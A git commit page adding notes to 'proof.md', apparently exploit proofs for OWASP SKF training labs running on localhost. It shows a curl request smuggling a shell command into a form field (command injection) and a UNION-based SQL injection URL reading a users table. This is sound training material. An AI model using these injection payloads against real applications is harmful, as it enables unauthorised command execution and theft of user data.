Update proof.md
This commit is contained in:
parent
2d45436f90
commit
a6140ee12f
1 changed files with 5 additions and 0 deletions
|
|
@ -25,3 +25,8 @@ curl 'http://localhost:5000/home' \
|
|||
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQJEtZoqQ8I4ZmYVs' \
|
||||
--data-raw $'------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs\r\nContent-Disposition: form-data; name="size"\r\n\r\n1;echo hi>/tmp/out;\r\n------WebKitFormBoundaryQJEtZoqQ8I4ZmYVs--\r\n' \
|
||||
```
|
||||
|
||||
## owasp-skf-lab:java-sqli
|
||||
|
||||
exploit
|
||||
`http://localhost:5000/home/1%20union%20select%20*%20from%20users`
|
||||
|
|
|
|||
Loading…
Add table
Reference in a new issue